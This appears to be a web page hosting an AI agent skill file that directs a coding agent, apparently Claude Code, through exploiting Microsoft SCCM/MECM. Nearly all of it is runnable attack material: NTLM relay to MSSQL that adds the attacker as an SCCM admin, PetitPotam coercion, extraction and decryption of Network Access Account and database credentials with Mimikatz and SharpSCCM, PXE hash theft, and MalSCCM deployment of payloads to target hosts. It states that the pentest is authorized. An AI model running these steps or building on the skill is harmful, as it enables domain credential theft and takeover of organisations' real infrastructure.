Agent skill

sccm-exploitation

Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting.

View SKILL.md on GitHub Repository
Stars 126
Forks 14

Install this agent skill to your Project

npx add-skill https://github.com/blacklanternsecurity/red-run/tree/main/skills/ad/sccm-exploitation

SKILL.md

SCCM/MECM Exploitation

You are helping a penetration tester enumerate and exploit Microsoft SCCM/MECM infrastructure for credential harvesting, lateral movement, and domain escalation. All testing is under explicit written authorization.

Engagement Logging

Check for ./engagement/ directory. If absent, proceed without logging.

When an engagement directory exists:

  • Print [sccm-exploitation] Activated → <target> to the screen on activation.
  • Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).

State Management

Call get_state_summary() from the state MCP server to read current engagement state. Use it to:

  • Skip re-testing targets, parameters, or vulns already confirmed
  • Leverage existing credentials or access for this technique
  • Understand what's been tried and failed (check Blocked section)

Your return summary must include:

  • New targets/hosts discovered (with ports and services)
  • New credentials or tokens found
  • Access gained or changed (user, privilege level, method)
  • Vulnerabilities confirmed (with status and severity)
  • Pivot paths identified (what leads where)
  • Blocked items (what failed and why, whether retryable)

Prerequisites

Access required: Domain user (for enumeration and NAA extraction via policy request). Local admin on SCCM client (for WMI/DPAPI extraction). Domain admin or relay position (for MP relay and database attacks).

Kerberos authentication setup (for enumeration):

bash
getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache

Tools: sccmhunter, SharpSCCM, MalSCCM, ntlmrelayx.py, PetitPotam, pxethiefy/PXEThief/SharpPXE, CMLoot, Mimikatz, SQLRecon.

Privileged Commands

Claude Code cannot execute sudo commands. The following require root and must be handed off to the user:

  • pxethiefy.py — PXE boot credential harvesting (needs raw sockets for DHCP/TFTP)
  • ntlmrelayx.py — NTLM relay to SCCM management point MSSQL (needs raw sockets)

Handoff protocol: Present the full command including sudo, ask the user to run it, then read the output or wait for callback confirmation.

Non-privileged commands Claude can execute directly:

  • Enumeration: sccmhunter, SharpSCCM, CMLoot
  • Policy extraction: sccmhunter http, sccmhunter show
  • Post-exploitation: SQLRecon, MalSCCM, Mimikatz
  • Coercion triggers: PetitPotam.py

Step 1: Enumerate SCCM Infrastructure

Discovery via sccmhunter

bash
# Find SCCM infrastructure in the domain
sccmhunter.py find -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP

# Display discovered site servers
sccmhunter.py show -siteservers

# HTTP-based enumeration (no WMI, broader info)
sccmhunter.py http -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP -auto

SharpSCCM (from compromised Windows host)

powershell
# Enumerate devices managed by site server
.\SharpSCCM.exe get devices --server SCCM01 --site-code P01

Unauthenticated MP Endpoints

bash
# Retrieve site signing cert + Unknown Computer GUIDs
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -

# List all management points
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPLIST | xmllint --format -

# Get site signing certificate
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?SITESIGNCERT | xmllint --format -

These HTTP endpoints are unauthenticated and reveal site structure.

Attack Path Decision Tree

SCCM Infrastructure Found
├── Have local admin on SCCM client? → Step 3 (NAA from WMI/DPAPI — quietest)
├── Can create machine account? → Step 2 (NAA via policy request)
├── Can reach MP + MSSQL? → Step 4 (MP relay to MSSQL)
├── Auto client push enabled? → Step 5 (Client push relay)
├── PXE-enabled DP? → Step 6 (PXE boot credential harvesting)
├── Have SCCM admin or DB access? → Step 7 (Database credential extraction)
└── Have SCCM admin? → Step 8 (Application deployment for lateral movement)

Step 2: NAA Extraction via Policy Request (CRED-2)

Extract Network Access Account credentials by requesting machine policy from the management point. Requires a machine account (real or created).

Create Machine Account + Request Policy

bash
# 1. Create a machine account (MAQ default allows this)
addcomputer.py -computer-name 'fakesccm$' -computer-pass 'Password123!' \
  'DOMAIN.LOCAL/user:pass' -dc-ip DC_IP

# 2. Add DNS entry for SCCM server (if not resolving)
echo "SCCM_IP  SCCM01 SCCM01.DOMAIN.LOCAL" >> /etc/hosts

# 3. Request policy from MP using fake computer identity (sccmwtf)
python3 sccmwtf.py fake fakepc.domain.local SCCM01 'DOMAIN\fakesccm$' 'Password123!'

# 4. Extract and decrypt NAA credentials from policy XML
cat /tmp/naapolicy.xml | grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 \
  | grep 'CDATA' | cut -d '[' -f 3 | cut -d ']' -f 1 \
  | xargs -I {} python3 policysecretunobfuscate.py {}

SharpSCCM Alternative

powershell
# From a compromised host (creates new device registration)
.\SharpSCCM.exe get naa -r newdevice -u fakesccm$ -p 'Password123!'
.\SharpSCCM.exe get secrets -u fakesccm$ -p 'Password123!'

Recovered secrets: NetworkAccessUsername, NetworkAccessPassword — typically a domain account used for SCCM client network access during OSD.

Step 3: NAA Extraction from Running Client (CRED-3 / CRED-4)

Extract NAA credentials from a compromised SCCM client's local WMI store. Requires local administrator on the SCCM client.

WMI Query + DPAPI Decryption (CRED-3)

powershell
# Query NAA from WMI (DPAPI-encrypted blobs)
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"
# Output: NetworkAccessPassword = <![CDATA[E600000001...]]>

# Decrypt with SharpSCCM (automated)
.\SharpSCCM.exe local secrets -m wmi

# Decrypt with SharpDPAPI (manual)
$str = "060...F2DAF"  # Hex from WMI output
$bytes = for($i=0; $i -lt $str.Length; $i++) {
  [byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++
}
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt

WMI Repository Search (CRED-4 — Legacy)

powershell
# Search WMI repository file for encrypted secrets
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA

# SharpSCCM automated disk search
.\SharpSCCM.exe local secrets -m disk

sccmhunter HTTP Method (Remote)

bash
# Remote NAA extraction via HTTP (if accessible)
sccmhunter.py http -u 'admin' -p 'Password' -d DOMAIN.LOCAL -dc-ip DC_IP -auto

Step 4: Management Point Relay to MSSQL (TAKEOVER-1)

Relay the management point's NTLM authentication to the SCCM database to gain sysadmin access and extract OSD policy secrets.

Prerequisites: Network access to MP and MSSQL, ability to coerce MP authentication (PetitPotam/PrinterBug/DFSCoerce).

Start Relay Listener

bash
# SOCKS proxy mode (for interactive SQL follow-on)
ntlmrelayx.py -ts -t mssql://MSSQL_IP -socks -smb2support

# Direct SQL execution — add yourself as SCCM admin
ntlmrelayx.py -smb2support -ts -t mssql://MSSQL_IP -q "USE CM_P01; \
  INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) \
  VALUES (0x<YOUR_SID_HEX>,'DOMAIN\\your_user',0,0,'','','','','P01'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00ALL','29'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00001','1'); \
  INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
  VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00004','1');"

Coerce MP Authentication

bash
# PetitPotam to coerce MP to authenticate to relay listener
python3 PetitPotam.py RELAY_LISTENER_IP MP_IP -u user -p pass -d DOMAIN -dc-ip DC_IP

Extract OSD Secrets via SOCKS Proxy

bash
# Connect to MSSQL through relay SOCKS proxy
proxychains mssqlclient.py -windows-auth 'DOMAIN/MP01$'@MSSQL_IP
sql
-- Get Unknown Computer GUIDs
USE CM_P01;
SELECT SMS_Unique_Identifier0 FROM dbo.UnknownSystem_DISC WHERE DiscArchKey = 2;

-- List policies assigned to Unknown Computer
EXEC MP_GetMachinePolicyAssignments N'<GUID>', N'';

-- Retrieve full policy body
EXEC MP_GetPolicyBody N'{POLICY_ID}', N'2.00';

Decrypt Policy Blob

bash
# Convert hex policy to XML
echo 'fffe3c003f0078...' | xxd -r -p > policy.xml

# Decrypt embedded credential values with PXEthief
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)

Recovers: OSDJoinAccount/Password, NetworkAccessUsername/Password, and other task sequence variable credentials.

sccmhunter Automated MSSQL Path

bash
# Automated SQL execution for RBAC admin + privilege escalation
sccmhunter.py mssql -u user -p pass -d DOMAIN.LOCAL -dc-ip DC_IP \
  -tu your_user -sc P01 -stacked

Step 5: Client Push Account Relay (ELEVATE-2)

If automatic site-wide client push is enabled, trigger the SCCM site server to authenticate as the client push account and relay it.

bash
# 1. Start relay targeting MSSQL (or SMB/LDAP)
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support

# 2. Trigger client push to your IP
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP

SCCM site server authenticates as the client push installation account to your IP — relay to MSSQL for sysadmin or to LDAP for RBCD/machine account creation.

Conditions: Automatic site-wide client push enabled + automatic device approval + NTLM fallback allowed.

Step 6: PXE Boot Credential Harvesting (CRED-1)

Extract credentials from PXE-enabled Distribution Points.

pxethiefy (Linux)

bash
# Listen for PXE responses and extract boot variables
sudo python3 pxethiefy.py explore -i eth0
# Extracts variables.dat, decrypts or outputs Hashcat hash

SharpPXE (Windows)

powershell
# Send PXE boot request, download variables.dat via TFTP
.\SharpPXE.exe
# If password-protected: outputs $sccm$aes128$... for Hashcat

Manual TFTP Download

bash
# TFTP is unauthenticated on PXE-enabled DPs
tftp MP01.domain.local
tftp> get SMSBoot\\x64\\pxe\\variables.dat

# If password-protected: save hash to evidence for cracking
# Hash format: $sccm$aes128$... (hashcat mode 31100)
cp hash.txt engagement/evidence/sccm-pxe-hash.txt

Do NOT crack hashes in this skill. Save the PXE hash to engagement/evidence/ and return to the orchestrator with the hash file path, hash type (SCCM PXE / hashcat mode 31100), and a routing recommendation to credential-recovery.

Recovered: Management Point URL, site code, media GUIDs, potentially task sequence credentials.

Step 7: Database Credential Extraction (CRED-5)

Extract all encrypted credentials from the SCCM database's SC_UserAccount table. Requires sysadmin access to the database (via relay or direct).

Mimikatz (Direct SCCM Decryption)

powershell
# Queries SC_UserAccount + decrypts all credentials
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=CM_P01;SERVER=MSSQL01;"

SQLRecon

powershell
# On site server where DB is local
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:sDecryptCredentials

# Manual extraction
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:query /command:"SELECT * FROM SC_UserAccount"

Manual Decryption

bash
# Decrypt extracted values with xpn's PoC
sccmdecryptpoc.exe 0C010000080...5D6F0

Step 8: Application Deployment for Lateral Movement

Deploy malicious applications to device collections for code execution on target machines. Requires SCCM admin access.

MalSCCM (Full Chain)

powershell
# 1. Enumerate targets
MalSCCM.exe locate
MalSCCM.exe inspect /computers

# 2. Create device collection
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device

# 3. Add target hosts
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET01

# 4. Create application (UNC path to payload on SCCMContentLib$)
MalSCCM.exe app /create /name:update /uncpath:"\\\\SCCM01\\SCCMContentLib$\\payload.exe"

# 5. Deploy to group
MalSCCM.exe app /deploy /name:update /groupname:TargetGroup /assignmentname:deploy01

# 6. Force immediate checkin
MalSCCM.exe checkin /groupname:TargetGroup

# 7. Cleanup
MalSCCM.exe app /cleanup /name:update
MalSCCM.exe group /delete /groupname:TargetGroup

SharpSCCM (Simpler Execution)

powershell
# Direct command execution on device
.\SharpSCCM.exe exec -d TARGET01 -p "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt" -s

SCCM Share Looting (CMLoot)

powershell
# Inventory all files on SCCM shares
Invoke-CMLootInventory -SCCMHost SCCM01.domain.local -Outfile sccmfiles.txt

# Download interesting files
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
Invoke-CMLootDownload -SingleFile '\\SCCM01\SCCMContentLib$\DataLib\SC100001.1\x86\config.xml'

SCCMContentLib$ is world-readable and may contain application binaries, task sequence XML with embedded credentials, and configuration files.

Step 9: Escalate or Pivot

STOP and return to the orchestrator with:

  • What was achieved (RCE, creds, file read, etc.)
  • New credentials, access, or pivot paths discovered
  • Context for next steps (platform, access method, working payloads)

Troubleshooting

sccmhunter find Returns Nothing

  • Verify LDAP connectivity: nxc ldap DC_IP -u user -p pass
  • SCCM objects may be in a different naming context — try manual LDAP search for mSSMSSite objectClass
  • Site server may not be registered in AD (standalone) — scan network for port 80/443 on servers and check /SMS_MP/ endpoint

Policy Request Fails (NAA Extraction)

  • Management point may require PKI client certificate — check MP configuration for "HTTPS only" mode
  • Machine account may not be registered — use SharpSCCM to register a new device identity
  • DNS must resolve the MP hostname — add /etc/hosts entry

Relay to MSSQL Fails

  • SMB signing may be required on MSSQL host — check with nxc smb MSSQL_IP for signing status
  • MSSQL may not accept relay — Extended Protection for Authentication (EPA) blocks relay on modern SQL Server
  • Verify MP is sysadmin on DB — try SOCKS proxy after relay to confirm

PXE Boot Extraction Fails

  • PXE must be enabled on Distribution Point — check registry HKLM\Software\Microsoft\SMS\DP\PxeInstalled
  • Need network reachability on UDP 4011 (DHCP proxy) and UDP 69 (TFTP)
  • If password-protected: extract hash and route to credential-recovery (mode 31100)

Application Deployment Not Executing

  • Default GPUpdate interval is 90 minutes — use MalSCCM.exe checkin or gpupdate /force on target
  • Verify device is in the collection: MalSCCM.exe inspect /groups
  • Check SCCM client logs on target: C:\Windows\CCM\Logs\

KRB_AP_ERR_SKEW (Clock Skew)

Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew Interrupt — stop immediately and return to the orchestrator. Do not retry or fall back to NTLM. The fix requires root:

bash
sudo ntpdate DC_IP
# or
sudo rdate -n DC_IP

OPSEC Comparison

Technique OPSEC Detection Prerequisites
SCCM enumeration (sccmhunter find) Low-Medium LDAP queries Domain user
MP HTTP endpoint queries Low IIS logs Network access
NAA from WMI (CRED-3) Low Local execution Local admin on client
NAA from WMI repository (CRED-4) Low File access Local admin on client
NAA via policy request (CRED-2) Medium-High Machine account creation + MP logs Domain user
SCCM share looting (CMLoot) Low SMB access logs Domain user
PXE boot harvesting (CRED-1) Medium DHCP/TFTP logs on DP Network access
MP relay to MSSQL (TAKEOVER-1) High Coercion + relay + SQL audit Network position
Client push relay (ELEVATE-2) High Server logs + auth events Client push enabled
Database extraction (CRED-5) High SQL audit logs DB sysadmin
Application deployment High Extensive SCCM + client logs SCCM admin

Recommended Agent Skills

Expand your agent's capabilities with these related and highly-rated skills.

blacklanternsecurity/red-run

credential-recovery

Offline credential and file recovery with hashcat and john. Use when any skill captures hashes (NTLM, Kerberos TGS/AS-REP, shadow, MSCACHE2) or encrypted files (ZIP, Office, PDF, KeePass, SSH key, 7z, RAR). Trigger phrases: "recover this hash", "offline recovery", "john", "hashcat", "zip2john", "password-protected file". Do NOT use for online password attacks (spraying, brute force against services) — use password-spraying instead.

126 14
Explore
blacklanternsecurity/red-run

remote-access-enumeration

Enumeration of remote access services: FTP, SSH, RDP, VNC, and WinRM. Checks anonymous access, default credentials, version vulnerabilities, and authentication methods. Use after network-recon identifies remote access ports.

126 14
Explore
blacklanternsecurity/red-run

smb-enumeration

SMB share enumeration, access testing, password policy extraction, and content searching. Enumerates shares via null session, guest, and authenticated access. Covers share listing, per-share access testing, MANSPIDER content search, and SMB vulnerability detection (signing, EternalBlue). Use after network-recon identifies SMB ports (139/445).

126 14
Explore
blacklanternsecurity/red-run

infrastructure-enumeration

Enumeration of infrastructure services: DNS, SMTP, SNMP, IPMI, NFS, TFTP, RPC/MSRPC, and HTTP/HTTPS surface detection. Checks zone transfers, open relays, default community strings, cipher zero, NFS exports, and web technology fingerprinting. Use after network-recon identifies infrastructure ports.

126 14
Explore
blacklanternsecurity/red-run

network-recon

Network reconnaissance, host discovery, port scanning, and OS fingerprinting. Produces a port/service map that the orchestrator uses to route to service-specific enumeration skills.

126 14
Explore
blacklanternsecurity/red-run

container-escapes

Container escape, Docker breakout, and Kubernetes exploitation.

126 14
Explore

Didn't find tool you were looking for?

Be as detailed as possible for better results